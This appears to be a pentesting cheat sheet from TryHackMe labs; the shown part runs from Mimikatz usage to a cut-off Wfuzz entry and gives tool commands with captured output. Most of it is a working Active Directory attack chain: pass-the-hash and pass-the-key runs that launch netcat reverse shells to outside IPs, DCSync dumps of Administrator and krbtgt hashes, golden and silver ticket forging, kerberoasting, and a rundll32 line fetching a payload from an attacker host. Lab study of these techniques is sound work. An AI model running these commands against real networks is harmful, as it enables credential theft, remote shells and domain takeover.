THMJMP2$ * Domain : za.tryhackme.com * Password : 09 59 d6 d2 07 35 80 75 25 4f b2 ab 9f 53 ba 68 28 e4 72 8d eb 1c 8f ec b2 6a 11 7e 6e d8 72 22 00 8c a0 6 a ed 7f d6 7c 70 6c ce 61 04 9a 76 d7 2e 74 96 4b c0 2e e1 23 a0 a5 09 15 fc af 8c da 57 28 b7 83 17 d4 74 28 c1 07 5f 67 c4 8c df 76 14 3e ba d6 70 3a 34 63 4c d9 e8 b3 e1 8c 18 94 c1 a5 21 01 38 b6 9d 22 07 be 45 cb ae 4d d9 00 c8 db 37 16 05 b7 14 ec 68 11 ba 38 6a c2 23 07 c2 1c a1 fe 87 dd 02 4a 21 07 6a c7 66 26 d1 ee 18 2c 72 62 70 11 5c e5 2a 58 03 fd 8a 65 88 a0 59 9a 5b 9 9 3a 51 40 dc 60 22 e4 7d 5d ed b2 3a e1 2c f3 c9 1e eb d5 1f e1 4e 0c 19 4e 4f 65 22 bd 1f c0 72 d6 32 1a 1e fa 1b 66 a9 2c 2c 06 68 23 71 0d 63 9d 9a d5 b6 dd 1d 48 0c 70 c4 3a 06 73 84 74 13 b0 be f7 37 ef c1 8e ce bb cd 34 c6 ssp : credman : [...]# Pass-the-hash * Process Token : {0;0031373f} 0 D 3228104 ZA\t2_felicia.dean S-1-5-21-3330634377-1326264276-632209373-4605 (12g,24p) Primary * Thread Token : no token ------------------------------------------------- mimikatz # sekurlsa::pth /user:bob.jenkins /domain:za.tryhackme.com /ntlm:6b4a57f67805a663c818106dc0648484 /run:"c:\tools\nc64.exe -e cmd.exe 10.50.46.84 5555" user : bob.jenkins domain : za.tryhackme.com program : c:\tools\nc64.exe -e cmd.exe 10.50.46.84 5555 impers. : no NTLM : 6b4a57f67805a663c818106dc0648484 | PID 5780 | TID 9148 | LSA Process is now R/W | LUID 0 ; 3365485 (00000000:00335a6d) \_ msv1_0 - data copy @ 000001490C409A50 : OK ! \_ kerberos - data copy @ 000001490CE87138 \_ aes256_hmac -> null \_ aes128_hmac -> null \_ rc4_hmac_nt OK \_ rc4_hmac_old OK \_ rc4_md4 OK \_ rc4_hmac_nt_exp OK \_ rc4_hmac_old_exp OK \_ *Password replace @ 000001490CE7A188 (32) -> null# Prepare for Pass-the-ticket mimikatz # sekurlsa::tickets /export [...] Authentication Id : 0 ; 996 (00000000:000003e4) Session : Service from 0 User Name : CONTROLLER-1$ Domain : CONTROLLER Logon Server : (null) Logon Time : 10/22/2025 6:10:56 AM SID : S-1-5-20 * Username : controller-1$ * Domain : CONTROLLER.LOCAL * Password : (null) Group 0 - Ticket Granting Service [00000000] Start/End/MaxRenew: 10/22/2025 6:41:02 AM ; 10/22/2025 4:41:02 PM ; 10/29/2025 6:41:02 AM Service Name (02) : ldap ; CONTROLLER-1.CONTROLLER.local ; CONTROLLER.local ; @ CONTROLLER.LOCAL Target Name (02) : ldap ; CONTROLLER-1.CONTROLLER.local ; CONTROLLER.local ; @ CONTROLLER.LOCAL Client Name (01) : CONTROLLER-1$ ; @ CONTROLLER.LOCAL ( CONTROLLER.LOCAL ) Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac a282e2cf28b04ff613687f4d7de574c39a454a497f3b59ffd8e640be6a8a815c Ticket : 0x00000012 - aes256_hmac ; kvno = 5 [...] * Saved to file [0;3e4]-0-0-40a50000-CONTROLLER-1$@ldap-CONTROLLER-1.CONTROLLER.local.kirbi ! Group 1 - Client Ticket ? Group 2 - Ticket Granting Ticket [00000000] Start/End/MaxRenew: 10/22/2025 6:41:02 AM ; 10/22/2025 4:41:02 PM ; 10/29/2025 6:41:02 AM Service Name (02) : krbtgt ; CONTROLLER.LOCAL ; @ CONTROLLER.LOCAL Target Name (02) : krbtgt ; CONTROLLER.local ; @ CONTROLLER.LOCAL Client Name (01) : CONTROLLER-1$ ; @ CONTROLLER.LOCAL ( CONTROLLER.local ) Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac f833395fefa76f87d2ac6e5027a1f3551807a49e212d4e83a10d1fd8318ff919 Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...] * Saved to file [0;3e4][email protected] ! [...] Authentication Id : 0 ; 418733 (00000000:000663ad) Session : Network from 0 User Name : CONTROLLER-1$ Domain : CONTROLLER Logon Server : (null) Logon Time : 10/22/2025 6:16:17 AM SID : S-1-5-18 * Username : CONTROLLER-1$ * Domain : CONTROLLER.LOCAL * Password : (null) Group 0 - Ticket Granting Service Group 1 - Client Ticket ? [00000000] Start/End/MaxRenew: 10/22/2025 6:11:35 AM ; 10/22/2025 4:11:35 PM ; Service Name (02) : ldap ; CONTROLLER-1.CONTROLLER.local ; @ CONTROLLER.LOCAL Target Name (--) : @ CONTROLLER.LOCAL Client Name (01) : CONTROLLER-1$ ; @ CONTROLLER.LOCAL Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac 428da5713fa16eaa1a9722b93ab4f89c58e13dc92bacec20579f82b3fdd1c299 Ticket : 0x00000012 - aes256_hmac ; kvno = 5 [...] * Saved to file [0;663ad]-1-0-40a50000-CONTROLLER-1$@ldap-CONTROLLER-1.CONTROLLER.local.kirbi ! Group 2 - Ticket Granting Ticket [...] mimikatz #✅ 1. Logon Type: Service vs Network
- Service from 0 (second ticket) vs Network from 0 (first ticket).
- Service logons often indicate automated or scheduled tasks, and may have persistent access or elevated privileges.
- Network logons are more transient and may be harder to reuse effectively.
✅ 3. Ticket Types
- The second ticket includes both:
- A TGT (krbtgt) — reusable for Pass-the-Ticket attacks.
- A TGS for LDAP — useful for enumeration, Active Directory abuse, or DCSync if permissions allow.
# Confirm pass-the-ticket worked C:\Users\Administrator\Downloads>klist Current LogonId is 0:0x2db899 Cached Tickets: (1) #0> Client: CONTROLLER-1$ @ CONTROLLER.LOCAL Server: krbtgt/CONTROLLER.LOCAL @ CONTROLLER.LOCAL KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize Start Time: 10/22/2025 6:41:02 (local) End Time: 10/22/2025 16:41:02 (local) Renew Time: 10/29/2025 6:41:02 (local) Session Key Type: AES-256-CTS-HMAC-SHA1-96 Cache Flags: 0x1 -> PRIMARY Kdc Called: C:\Users\Administrator\Downloads>✅ Why This Ticket Is Ideal for PTT
- Client: — a machine account, often with elevated privileges.
CONTROLLER-1$ - Server: — confirms this is a Ticket Granting Ticket (TGT).
krbtgt/CONTROLLER.LOCAL - Encryption: — strong and supported by Mimikatz.
AES-256-CTS-HMAC-SHA1-96 - Flags:
- ,
forwardable,renewable,initial,pre_authent— all ideal for reuse and impersonation.name_canonicalize
- Session Key: Present and valid.
- Cache Flags: — this ticket is now active in the current session.
PRIMARY
mimikatz # lsadump::dcsync /user:Administrator [DC] 'CONTROLLER.local' will be the domain [DC] 'CONTROLLER-1.CONTROLLER.local' will be the DC server [DC] 'Administrator' will be the user account Object RDN : Administrator ** SAM ACCOUNT ** SAM Username : Administrator Account Type : 30000000 ( USER_OBJECT ) User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD ) Account expiration : Password last change : 5/25/2020 12:22:39 PM Object Security ID : S-1-5-21-432953485-3795405108-1502158860-500 Object Relative ID : 500 Credentials: Hash NTLM: 2777b7fec870e04dda00cd7260f7bee6 Supplemental Credentials: * Primary:NTLM-Strong-NTOWF * Random Value : 7bfd4ae86442827fb0db294d5c9855ce * Primary:Kerberos-Newer-Keys * Default Salt : WIN-G83IJFV2N03Administrator Default Iterations : 4096 Credentials aes256_hmac (4096) : 42b3c13c8c0fef3175eb2b5926f805f919123efd001a9c5a16ee9a86101e32b4 aes128_hmac (4096) : d01d6ccf97a2ee214ec7185173a3b659 des_cbc_md5 (4096) : 918abaf7dcb02ce6 * Packages * NTLM-Strong-NTOWF * Primary:Kerberos * Default Salt : WIN-G83IJFV2N03Administrator Credentials des_cbc_md5 : 918abaf7dcb02ce6 mimikatz #✅ What This Means
- You were able to replicate domain controller behavior and extract sensitive credentials for the account.
Administrator - This includes:
- NTLM hash:
2777b7fec870e04dda00cd7260f7bee6 - Kerberos keys: AES256, AES128, and DES
- Supplemental credentials like NTLM-Strong-NTOWF
- NTLM hash:
🧠 Why This Is Powerful
With these credentials, you can:
- Pass-the-Hash using the NTLM hash
- Craft Golden Tickets using the Kerberos keys
- Impersonate the domain admin across the network
- Maintain persistence even if the original ticket expires
# Extract the krtgt NTLM hash - This simulates a domain controller replication request and pulls the krbtgt hash without touching the disk. # TGTs are signed with the KRBTGT account’s password hash. Since we have the KRBTGT hash, we can forge a TGT, aka a GOLDEN TICKET mimikatz # lsadump::dcsync /user:krbtgt [DC] 'CONTROLLER.local' will be the domain [DC] 'CONTROLLER-1.CONTROLLER.local' will be the DC server [DC] 'krbtgt' will be the user account Object RDN : krbtgt ** SAM ACCOUNT ** SAM Username : krbtgt Account Type : 30000000 ( USER_OBJECT ) User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT ) Account expiration : Password last change : 5/25/2020 3:06:51 PM Object Security ID : S-1-5-21-432953485-3795405108-1502158860-502 Object Relative ID : 502 Credentials: Hash NTLM: 72cd714611b64cd4d5550cd2759db3f6 ntlm- 0: 72cd714611b64cd4d5550cd2759db3f6 lm - 0: aec7e106ddd23b3928f7b530f60df4b6 Supplemental Credentials: * Primary:NTLM-Strong-NTOWF * Random Value : 4b9102d709aada4d56a27b6c3cd14223 * Primary:Kerberos-Newer-Keys * Default Salt : CONTROLLER.LOCALkrbtgt Default Iterations : 4096 Credentials aes256_hmac (4096) : dfb518984a8965ca7504d6d5fb1cbab56d444c58ddff6c193b64fe6b6acf1033 aes128_hmac (4096) : 88cc87377b02a885b84fe7050f336d9b des_cbc_md5 (4096) : 79bf07137a8a6b8f * Primary:Kerberos * Default Salt : CONTROLLER.LOCALkrbtgt Credentials des_cbc_md5 : 79bf07137a8a6b8f * Packages * NTLM-Strong-NTOWF * Primary:WDigest * 01 d2e9aa3caa4509c3f11521c70539e4ad 02 c9a868fc195308b03d72daa4a5a4ee47 03 171e066e448391c934d0681986f09ff4 04 d2e9aa3caa4509c3f11521c70539e4ad 05 c9a868fc195308b03d72daa4a5a4ee47 06 41903264777c4392345816b7ecbf0885 07 d2e9aa3caa4509c3f11521c70539e4ad 08 9a01474aa116953e6db452bb5cd7dc49 09 a8e9a6a41c9a6bf658094206b51a4ead 10 8720ff9de506f647ad30f6967b8fe61e 11 841061e45fdc428e3f10f69ec46a9c6d 12 a8e9a6a41c9a6bf658094206b51a4ead [...] mimikatz ## Create a golden ticket mimikatz # kerberos::golden /user:Administrator /domain:CONTROLLER.LOCAL /sid:S-1-5-21-432953485-3795405108-1502158860 /krbtgt:72cd714611b64cd4d5550cd2759db3f6 /id:500 /groups:512 /ptt User : Administrator Domain : CONTROLLER.LOCAL (CONTROLLER) SID : S-1-5-21-432953485-3795405108-1502158860 User Id : 500 Groups Id : *512 ServiceKey: 72cd714611b64cd4d5550cd2759db3f6 - rc4_hmac_nt Lifetime : 10/22/2025 7:51:52 AM ; 10/20/2035 7:51:52 AM ; 10/20/2035 7:51:52 AM -> Ticket : ** Pass The Ticket ** * PAC generated * PAC signed * EncTicketPart generated * EncTicketPart encrypted * KrbCred generated Golden ticket for 'Administrator @ CONTROLLER.LOCAL' successfully submitted for current session mimikatz ## Confirm the Golden Ticket was successfully created and injected [00000000] - 0x00000017 - rc4_hmac_nt Start/End/MaxRenew: 10/22/2025 7:51:52 AM ; 10/20/2035 7:51:52 AM ; 10/20/2035 7:51:52 AM Server Name : krbtgt/CONTROLLER.LOCAL @ CONTROLLER.LOCAL Client Name : Administrator @ CONTROLLER.LOCAL Flags 40e00000 : pre_authent ; initial ; renewable ; forwardable ; # Confirm TGT was accepted by the DC, and we now have administrative access to DC C:\Users\Administrator\Downloads>net use \\CONTROLLER-1\C$ /user:Administrator The command completed successfully.# Generate a Silver ticket for CIFS service, using the rc4 (NTLM) hash of the SQL service account kerberos::golden /admin:StillNotALegitAccountEither /domain:CONTROLLER.local /id:500 /sid:S-1-5-21-432953485-3795405108-1502158860 /target:controller-1.local /rc4:cd40c9ed96265531b21fc5b1dafcfb0a /service:cifs /ptt User : StillNotALegitAccountEither Domain : CONTROLLER.local (CONTROLLER) SID : S-1-5-21-432953485-3795405108-1502158860 User Id : 500 Groups Id : *513 512 520 518 519 ServiceKey: cd40c9ed96265531b21fc5b1dafcfb0a - rc4_hmac_nt Service : cifs Target : controller-1.local Lifetime : 10/25/2025 3:41:06 AM ; 10/23/2035 3:41:06 AM ; 10/23/2035 3:41:06 AM -> Ticket : ** Pass The Ticket ** * PAC generated * PAC signed * EncTicketPart generated * EncTicketPart encrypted * KrbCred generated Golden ticket for 'StillNotALegitAccountEither @ CONTROLLER.local' successfully submitted for current session mimikatz ## DC-Sync All mimikatz # lsadump::dcsync /domain:controller.local /all [DC] 'controller.local' will be the domain [DC] 'CONTROLLER-1.CONTROLLER.local' will be the DC server [DC] Exporting domain 'controller.local' Object RDN : CONTROLLER Object RDN : LostAndFound [...] ** SAM ACCOUNT ** SAM Username : Guest User Account Control : 00010222 ( ACCOUNTDISABLE PASSWD_NOTREQD NORMAL_ACCOUNT DONT_EXPIRE_PASSWD ) Object Security ID : S-1-5-21-432953485-3795405108-1502158860-501 Object Relative ID : 501 Credentials: Object RDN : Builtin Object RDN : S-1-5-4 Object RDN : S-1-5-11 Object RDN : Remote Desktop Users ** SAM ACCOUNT ** SAM Username : Remote Desktop Users Object Security ID : S-1-5-32-555 Object Relative ID : 555 Credentials: Object RDN : Network Configuration Operators [...]# Prepare for overpass-the-hash (RC4-hash) and pass-the-key (AES-key) mimikatz # sekurlsa::ekeys Authentication Id : 0 ; 288048 (00000000:00046530) Session : RemoteInteractive from 2 User Name : Administrator Domain : CONTROLLER Logon Server : CONTROLLER-1 Logon Time : 10/22/2025 8:08:33 AM SID : S-1-5-21-432953485-3795405108-1502158860-500 * Username : Administrator * Domain : CONTROLLER.LOCAL * Password : (null) * Key List : aes256_hmac 42b3c13c8c0fef3175eb2b5926f805f919123efd001a9c5a16ee9a86101e32b4 rc4_hmac_nt 2777b7fec870e04dda00cd7260f7bee6 rc4_hmac_old 2777b7fec870e04dda00cd7260f7bee6 rc4_md4 2777b7fec870e04dda00cd7260f7bee6 rc4_hmac_nt_exp 2777b7fec870e04dda00cd7260f7bee6 rc4_hmac_old_exp 2777b7fec870e04dda00cd7260f7bee6 Authentication Id : 0 ; 243593 (00000000:0003b789) [...]# Pass-the-key attack # Note the use of the aes256 key sekurlsa::pth /user:Administrator /domain:controller.local /aes256:42b3c13c8c0fef3175eb2b5926f805f919123efd001a9c5a16ee9a86101e32b4 /run:"c:\Users\Administrator\Downloads\ncat.exe -e cmd.exe 10.10.177.75 5556" user : Administrator domain : controller.local program : c:\Users\Administrator\Downloads\ncat.exe -e cmd.exe 10.10.177.75 5556 impers. : no AES256 : 42b3c13c8c0fef3175eb2b5926f805f919123efd001a9c5a16ee9a86101e32b4 | PID 1652 | TID 3520 | LSA Process is now R/W | LUID 0 ; 2299698 (00000000:00231732) \_ msv1_0 - data copy @ 0000018F801560F0 : OK ! \_ kerberos - data copy @ 0000018F83F33788 \_ aes256_hmac OK \_ aes128_hmac -> null \_ rc4_hmac_nt -> null \_ rc4_hmac_old -> null \_ rc4_md4 -> null \_ rc4_hmac_nt_exp -> null \_ rc4_hmac_old_exp -> null \_ *Password replace @ 0000018F83E810C8 (32) -> null mimikatz ## Overpass-the-hash attack # Note the use of the RC4 key - basically the NTLM hash sekurlsa::pth /user:Administrator /domain:controller.local /rc4:2777b7fec870e04dda00cd7260f7bee6 /run:"c:\Users\Administrator\Downloads\ncat.exe -e cmd.exe 10.10.177.75 5557" user : Administrator domain : controller.local program : c:\Users\Administrator\Downloads\ncat.exe -e cmd.exe 10.10.177.75 5557 impers. : no NTLM : 2777b7fec870e04dda00cd7260f7bee6 | PID 1556 | TID 4520 | LSA Process was already R/W | LUID 0 ; 2390443 (00000000:002479ab) \_ msv1_0 - data copy @ 0000018F801577A0 : OK ! \_ kerberos - data copy @ 0000018F83F345E8 \_ aes256_hmac -> null \_ aes128_hmac -> null \_ rc4_hmac_nt OK \_ rc4_hmac_old OK \_ rc4_md4 OK \_ rc4_hmac_nt_exp OK \_ rc4_hmac_old_exp OK \_ *Password replace @ 0000018F83E7E428 (32) -> null mimikatz #
14. Rubeus
-
Use Case: Kerberos attacks (AS-REP roast, kerberoast, ticket ops). Github
-
Input Example:
Rubeus.exe kerberoastRubeus.exe asreproast /domain:controller.local /dc:10.10.106.82Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to> /domain:za.tryhackme.loc /dc:<IP of domain controllerRubeus.exe brute </password:PASSWORD | /passwords:PASSWORDS_FILE> [/user:USER | /users:USERS_FILE] [/domain:DOMAIN] [/creduser:DOMAIN\\USER & /credpassword:PASSWORD] [/ou:ORGANIZATION_UNIT] [/dc:DOMAIN_CONTROLLER] [/outfile:RESULT_PASSWORD_FILE] [/noticket] [/verbose] [/nowrap] -
Output Example:
[*] Action: Kerberoasting [*] NOTICE: AES hashes will be returned for AES-enabled accounts. [*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts. [*] Searching the current domain for Kerberoastable users [*] Total kerberoastable users : 2 [*] SamAccountName : SQLService [*] DistinguishedName : CN=SQLService,CN=Users,DC=CONTROLLER,DC=local [*] ServicePrincipalName : CONTROLLER-1/SQLService.CONTROLLER.local:30111 [*] PwdLastSet : 5/25/2020 10:28:26 PM [*] Supported ETypes : RC4_HMAC_DEFAULT [*] Hash : $krb5tgs$23$*SQLService$CONTROLLER.local$CONTROLLER-1/SQLService.CONTROLLER.loca l:30111*$9CEAC4D28E5F22C73262175A7786CAED$07F27F494F52F0CB6CA43246773162C2A753DB 34FF08AB7D9547B211138B07E7969628FA5FD65F89B99A2A8449C8CFFD56B8B98903B74F01AF69A5 B9F39F0BD3CAC4CB2E310CDF63624CADFD827B112B736E3E42A99AD0568C10FFF482D2411D4F9385 B0A1AEF8E189D869854B2F5F24B41034510A4EFA86F38E997687809701A5A6423DE0DC2D19D9F425 043FDE54A46E682D95B554D89AEBF7ED450966431CABF74EF81879BBC7D38D6CB8FB82EE6B622400 F6F80AD5690E0CB8DBDB6736C2D4FED2F81837109924340373C84AD567D5442D36E4CBA10CD175CC D7B7A9F846AEAE0338E9E7B65312FCEB3D6DCADCFC1E28DAC48FF2A2292E8C3DF9CBE87C66318BD8 40B49DC5616123EB4868F799D2B08491FD518ADB19DD5DD2733E1A4378097CB8857D403C3035B0FB CB5C2D945560FD6D681D825FFD2AE413962604769A9EECEBDE899AE4EF6AF685F411C857779F9AC9 [...][*] Action: AS-REP roasting [*] Target Domain : controller.local [*] Target DC : 10.10.106.82 [*] Searching path 'LDAP://10.10.106.82/DC=controller,DC=local' for AS-REP roastable users [*] SamAccountName : Admin2 [*] DistinguishedName : CN=Admin-2,CN=Users,DC=CONTROLLER,DC=local [*] Using domain controller: 10.10.106.82 [*] Building AS-REQ (w/o preauth) for: 'controller.local\Admin2' [+] AS-REQ w/o preauth successful! [*] AS-REP hash: [email protected]:AEA5D810944F4838B91514AD1A79F57E$549ADA96785D 42B41B8DC1E033E7B8CA300850BACDB0D4860042B9484234DEDB1F2AEE4CF8C825FBCCC44B04E3E1 D9B482F43735BBA04A0636DDF5A360D7185EA84B7539BAE2D5BEA88ACCD6237100F2417A5E12C824 D723E78E914BE4D789CEA1719C0F0852B6554D493CB06E2BB9759826A52F5F917EF0814765F96430 21601A4F54902F8CC53705105787AC2832F505ADE8233AEBB8F1365DCE8EE73310C365415DE68260 58BA9D8D5844EEF0A7E70987773EE942B109D80468078A3CE37F2321017F776940EF8BB346CE94B1 6C97C771E1FAB782E3D7DE12F5E42BD505DE0C2B4D818286FC78F5EFB65C51BE0081900C3C71
15. Certify
-
Use Case: AD CS enumeration & misconfiguration abuse (ESC1–ESC8).
-
Input Example:
Certify.exe find /vulnerable -
Output Example:
Vulnerable template found: User Enrollment (ENROLLEE_SUPPLIES_SUBJECT)
16. Seatbelt
-
Use Case: Windows situational awareness (privs, AV, creds in files). Github
-
Input Example: Extended Group All Output
.\Seatbelt.exe -group=User -
Output Example:
====== azuread ====== Could not enumerate NetAadJoinInfo SeamlessSignOnDomainTrusted : (not configured) ====== Certificates ====== StoreLocation : CurrentUser Issuer : OU=EFS File Encryption Certificate, L=EFS, CN=Administrator Subject : OU=EFS File Encryption Certificate, L=EFS, CN=Administrator ValidDate : 5/25/2020 3:11:37 PM ExpiryDate : 5/1/2120 3:11:37 PM HasPrivateKey : True KeyExportable : False Thumbprint : 425951D040D3E06FBE08F8364239D64B6EAF95E8 EnhancedKeyUsages : File Recovery ====== CertificateThumbprints ====== [...] CurrentUser\TrustedPeople - 425951D040D3E06FBE08F8364239D64B6EAF95E8 (Administrator) 5/1/2120 3:11:37 PM ====== ChromiumPresence ====== ====== CloudCredentials ====== ====== CloudSyncProviders ====== ====== CredEnum ====== ====== dir ====== LastAccess LastWrite Size Path [...] 25-10-22 25-10-22 682.5KB C:\Users\Administrator\Documents\Seatbelt.exe 25-10-22 25-10-22 3.1KB C:\Users\Administrator\Documents\seatbelt_output.txt ====== DpapiMasterKeys ====== Folder : C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-432953485-3795405108-1502158860-500 LastAccessed LastModified FileName ------------ ------------ -------- 1/3/2021 7:28:18 AM 1/3/2021 7:28:18 AM 59ef089e-15fb-408d-bbdb-675d5d0a9128 5/25/2020 3:11:37 PM 5/25/2020 3:11:37 PM 5b6373ac-26de-40ad-b718-b28de198c6a1 [*] Use the Mimikatz "dpapi::masterkey" module with appropriate arguments (/pvk or /rpc) to decrypt [*] You can also extract many DPAPI masterkeys from memory with the Mimikatz "sekurlsa::dpapi" module [*] You can also use SharpDPAPI for masterkey retrieval. ====== ExplorerMRUs ====== ====== ExplorerRunCommands ====== ====== FileZilla ====== ====== FirefoxPresence ====== ====== IdleTime ====== CurrentUser : CONTROLLER\Administrator Idletime : 01h:06m:07s:125ms (3967125 milliseconds) ====== IEFavorites ====== Favorites (Administrator): http://go.microsoft.com/fwlink/p/?LinkId=255142 ====== IETabs ====== ====== IEUrls ====== Internet Explorer typed URLs for the last 7 days ====== KeePass ====== ====== MappedDrives ====== Mapped Drives (via WMI) ====== MTPuTTY ====== ====== OfficeMRUs ====== Enumerating Office most recently used files for the last 7 days App User LastAccess FileName --- ---- ---------- -------- ====== OneNote ====== OneNote files (Administrator): ====== OracleSQLDeveloper ====== ====== PowerShellHistory ====== ====== PuttyHostKeys ====== ====== PuttySessions ====== ====== RDCManFiles ====== ====== RDPSavedConnections ====== ====== SecPackageCreds ====== ====== SlackDownloads ====== ====== SlackPresence ====== ====== SlackWorkspaces ====== ====== SuperPutty ====== ====== TokenGroups ====== Current Token's Groups CONTROLLER\Domain Users S-1-5-21-432953485-3795405108-1502158860-513 Everyone S-1-1-0 BUILTIN\Administrators S-1-5-32-544 BUILTIN\Users S-1-5-32-545 BUILTIN\Pre-Windows 2000 Compatible Access S-1-5-32-554 NT AUTHORITY\NETWORK S-1-5-2 NT AUTHORITY\Authenticated Users S-1-5-11 NT AUTHORITY\This Organization S-1-5-15 CONTROLLER\Group Policy Creator Owners S-1-5-21-432953485-3795405108-1502158860-520 CONTROLLER\Domain Admins S-1-5-21-432953485-3795405108-1502158860-512 CONTROLLER\Enterprise Admins S-1-5-21-432953485-3795405108-1502158860-519 CONTROLLER\Schema Admins S-1-5-21-432953485-3795405108-1502158860-518 CONTROLLER\Denied RODC Password Replication Group S-1-5-21-432953485-3795405108-1502158860-572 NT AUTHORITY\NTLM Authentication S-1-5-64-10 ====== WindowsCredentialFiles ====== ====== WindowsVault ====== Vault GUID : 4bf4c442-9b8a-41a0-b380-dd4a704ddb28 Vault Type : Web Credentials Item count : 0 [*] Completed collection in 1.491 seconds
17. PsExec
Ports:
- 445/TCP (SMB)
💡Required Group Memberships: Administrators
-
Use Case: Remote command execution via SMB/Service Control Manager. Sysinternals
-
Input Example:
psexec.py ACME/jdoe:'P@ssw0rd'@10.10.10.30 cmd.exe /c whoami# Run process under a local system account with -s PsExec64.exe -s cmd.exe# Perform pass-the-key to get a reverse shell as t1_toby.beck sekurlsa::pth /user:t1_toby.beck /domain:za /aes256:6a0d48f79acaec013d928d84a102b72028d574340b6139e876e179db48fbde4e /run:"c:\tools\nc64.exe -e cmd.exe 10.150.74.4 4444" # From the reverse shell PsExec64.exe \\THMIIS.za.tryhackme.com cmd.exe /c "whoami" -
Output Example:
nt authority\systemPsExec v2.34 - Execute processes remotely Copyright (C) 2001-2021 Mark Russinovich Sysinternals - www.sysinternals.com za\t1_toby.beck Starting cmd.exe on THMIIS.za.tryhackme.com...yhackme.com... cmd.exe exited on THMIIS.za.tryhackme.com with error code 0. c:\tools>
18. Evil‑WinRM
-
Use Case: WinRM shell for post‑exploitation (PowerShell remoting). Github
-
Input Example:
evil-winrm -i 10.10.241.34 -u thmuser1 -p Password321evil-winrm -i 10.10.241.34 -u Administrator -H f3118544a831e728781d780cfdb9c1fa -
Output Example:
Evil-WinRM shell v3.4 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\thmuser1\Documents># From an Evil-WinRM shell, you can upload executables, e.g. Seatbelt *Evil-WinRM* PS C:\Users\Administrator\Documents> upload Seatbelt.exe
19. LOLbins
-
Use Case: Abuse built‑in Windows binaries to evade detection. LOLBins expanded
-
Input Example:
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";document.write();GetObject("script:https://attacker/payload.sct") -
Output Example:
(No stdout; payload executed via LOLBin)
20. Zed Attack Proxy (ZAP)
-
Use Case: Intercepting proxy, spidering, active/passive scanning.
-
Input Example:
zap-baseline.py -t https://app.example.com -r zap-report.html -
Output Example:
Alerts: X-Content-Type-Options missing (Medium), Reflected XSS (High)
21. Postman
-
Use Case: (GUI-based) API exploration, auth testing, crafting requests.
-
Input Example:
Import OpenAPI → Set env vars → Sendwith JSON body.POST /api/login -
Output Example:
200 OK {"token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."}
22. Gobuster / DirBuster
-
Use Case: Content discovery (dirs/files/vhosts). Github
-
Input Example:
gobuster dir -u 10.10.175.232 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt# Folder names are case sensitive gobuster dir -u 10.10.175.232/Changes -w /usr/share/wordlists/dirb/extensions_common.txt -x js,conf# Append-domain needed for vhost enumeration to work successfully gobuster vhost -u http://webenum.thm -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt --append-domaingobuster fuzz -u http://webenum.thm -H "Host: FUZZ.webenum.thm" -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -
Output Example:
=============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.175.232 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /images (Status: 301) [Size: 315] [--> http://10.10.175.232/images/] /public (Status: 301) [Size: 315] [--> http://10.10.175.232/public/] /css (Status: 301) [Size: 312] [--> http://10.10.175.232/css/] /js (Status: 301) [Size: 311] [--> http://10.10.175.232/js/] /Changes (Status: 301) [Size: 316] [--> http://10.10.175.232/Changes/] /VIDEO (Status: 301) [Size: 314] [--> http://10.10.175.232/VIDEO/] Progress: 218275 / 218276 (100.00%) =============================================================== Finished ===============================================================Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.175.232/Changes [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/extensions_common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Extensions: conf,js [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /.htm (Status: 403) [Size: 278] /.html.js (Status: 403) [Size: 278] /.html (Status: 403) [Size: 278] /.html.conf (Status: 403) [Size: 278] /.htm.conf (Status: 403) [Size: 278] /.htm.js (Status: 403) [Size: 278] /.php (Status: 403) [Size: 278] /.phtml (Status: 403) [Size: 278] / (Status: 200) [Size: 1365] Progress: 87 / 90 (96.67%) =============================================================== Finished ============================================================================================================================== Starting gobuster in VHOST enumeration mode =============================================================== Found: learning.webenum.thm Status: 200 [Size: 13245] Found: products.webenum.thm Status: 200 [Size: 4941] Progress: 4997 / 4998 (99.98%) =============================================================== Finished ===============================================================
23. Wfuzz
-
Use Case: Web fuzzing/brute forcing parameters. Github
-
Input Example:
